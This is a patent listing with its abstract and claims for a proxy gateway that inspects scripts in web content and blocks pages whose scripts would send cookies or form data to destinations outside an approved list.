Communication gateway apparatus, communication gateway method, and program product
First Claim
Patent Images
1. A communication gateway apparatus to be coupled between a server and a client, comprising:
- a reception unit configured to receive a content transferred from the server to the client;
an extraction unit configured to extract a script program from the received content;
a storage to store transfer destination information representing a plurality of transfer destinations designated as authentic;
an inspection unit configured to inspect the script program to detect that the script program has a function of transferring any one of information stored in the client and the received content, thereby identifying at least one transfer destination of the information;
a determination unit configured to determine whether or not transfer of the content is permitted, by collating the identified transfer destination of the information with the plurality of transfer destinations of the destination information; and
a transmission unit configured to transmit the content to the client only when the determination unit determines that transfer is permitted.
1 Assignment
0 Petitions
Accused Products
Abstract
When a proxy server receives contents transferred from a Web server to a Web browser, the proxy server extracts from the contents a script program having a function of sending cookie information stored in the Web browser from a client computer to an external transmission destination. When the script program is received, the proxy server determines whether transfer of the contents to the client computer is permitted, and only when transfer is permitted, transfers the contents to the client computer.
59 Citations
27 Claims
-
1. A communication gateway apparatus to be coupled between a server and a client, comprising:
-
a reception unit configured to receive a content transferred from the server to the client;
an extraction unit configured to extract a script program from the received content;
a storage to store transfer destination information representing a plurality of transfer destinations designated as authentic;
an inspection unit configured to inspect the script program to detect that the script program has a function of transferring any one of information stored in the client and the received content, thereby identifying at least one transfer destination of the information;
a determination unit configured to determine whether or not transfer of the content is permitted, by collating the identified transfer destination of the information with the plurality of transfer destinations of the destination information; and
a transmission unit configured to transmit the content to the client only when the determination unit determines that transfer is permitted. - View Dependent Claims (2, 3, 4, 5, 22, 23, 24, 25)
-
-
6. A communication gateway apparatus to be coupled between a server and a client, comprising:
-
a reception unit configured to receive a content having an input form and transferred from the server to the client;
an extraction unit configured to extract a script program from the received content;
a storage to store transfer destination information representing a plurality of transfer destinations designated as authentic;
an inspection unit configured to inspect the script program to detect that the script program has a function of changing a transmission destination of the input form, thereby identifying at least one changed transfer destination of the input form;
a determination unit configured to determine whether or not transfer of the content is permitted, by collating the changed transfer destination of the input form with the plurality of transfer destinations of the destination information; and
a transmission unit configured to transmit the content to the client only when the determination unit determines that transfer is permitted. - View Dependent Claims (7, 8, 9)
-
-
10. A communication gateway apparatus to be coupled between a server and a client, comprising:
-
a reception unit configured to receive a content having a first input form and transferred from the server to the client;
an extraction unit configured to extract a script program from the received content;
a storage to store request destination information representing a plurality of request destinations designated as authentic;
an inspection unit configured to inspect the script program to detect that the script program has a function of requesting an external content having a second input form to be used in place of the first input form, thereby identifying at least one request destination of the external content;
a determination unit configured to determine whether or not transfer of the content is permitted, by collating the identified request destination of the external content with the plurality of the request destinations of the destination information; and
a transmission unit configured to transmit the content to the client only when the determination unit determines that transfer is permitted. - View Dependent Claims (11, 12, 13)
-
-
14. A communication gateway apparatus to be coupled between a server and a client, comprising:
-
a reception unit configured to receive a content having a form and transferred from the server to the client;
an extraction unit configured to extract a script program from the received content;
a storage to store request destination information representing a plurality of request destinations designated as authentic;
an inspection unit configured to inspect the script program to detect that the script program has a function of requesting an external content having an input form to be inserted within the form, thereby identifying at least one request destination of the external content;
a determination unit configured to determine whether or not transfer of the content is permitted, by collating the identified request destination of the external content with the plurality of the request destinations of the destination information; and
a transmission unit configured to transmit the content to the client only when the determination unit determines that transfer is permitted. - View Dependent Claims (15, 16, 17)
-
-
18. A communication gateway apparatus to be coupled between a server and a client, comprising:
-
a reception unit configured to receive a content transferred from the server to the client;
an extraction unit configured to extract a script program from the received content;
a storage to store transfer destination information representing a plurality of transfer destinations designated as authentic;
an inspection unit configured to inspect the script program to detect that the script program has a function of adding an input form to the received content, and a function of transferring the input form, thereby identifying at least one transfer destination of the input form;
a determination unit configured to determine whether or not transfer of the content is permitted, by collating the identified transfer destination of the information with the plurality of transfer destinations of the destination information; and
a transmission unit configured to transmit the content to the client only when the determination unit determines that transfer is permitted. - View Dependent Claims (19, 20, 21)
-
-
26. A method of affording security of communication between a vulnerable server and a client, comprising:
-
receiving a content transferred from the vulnerable server;
extracting a script program from the received content;
inspecting the script program to identify a transfer destination of information, where transferring the information is caused by the client executing the script program;
collating the identified transfer destination of the information with a permitted transfer destination list; and
transmitting the received content to the client only if the identified transfer destination of the information is within the permitted transfer destination list, so as to prevent the information from illicitly transferring to a malicious server.
-
-
27. A computer program product for affording security of communication between a vulnerable server and a client, comprising:
-
means for instructing a computer to receive a content transferred from the vulnerable server;
means for instructing the computer to extract a script program from the received content;
means for instructing the computer to inspect the script program to identify a transfer destination of information, where transferring the information is caused by the client executing the script program;
means for instructing the computer to collate the identified transfer destination of the information with a permitted transfer destination list; and
means for instructing the computer to transmit the received content to the client only if the identified transfer destination of the information is within the permitted transfer destination list, so as to prevent the information from illicitly transferring to a malicious server.
-
Specification